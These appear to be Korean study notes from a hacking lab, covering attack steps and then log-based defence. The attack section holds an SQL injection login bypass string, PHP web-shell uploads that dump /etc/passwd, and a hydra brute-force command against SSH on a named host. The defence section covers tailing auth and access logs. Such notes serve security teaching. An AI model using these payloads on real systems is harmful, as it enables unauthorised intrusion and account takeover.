1. 공격

웹 로그인
*SQL 인젝션 공격*
1' or '1'='1
1' or '1'='1

사용자 알아내기
*파일 업로드 공격*
etcpasswd.php 파일 업로드
< ?php
   echo system("cat /etc/passwd");
=> 계정 알아내기

< ?php
$output = [];
exec("cat /etc/passwd", $output); // 명령어 실행 결과를 배열에 저장

foreach ($output as $line) {
    echo htmlspecialchars($line) . "< br>"; // 한 줄씩 출력
}
?>
=> 알아낸 계정 한줄씩 출력하기

비밀번호 알아내기
*사전 공격*
hydra -L account3jo.txt -P passwd3jo.txt web1.st.kr ssh


2. 방어

흔적 찾기
*서버 로그 확인
/var/log
tail -f auth.log 

*웹 로그 확인
/home/web1/public_html/logs
tail -f access.log

:22102 백업서버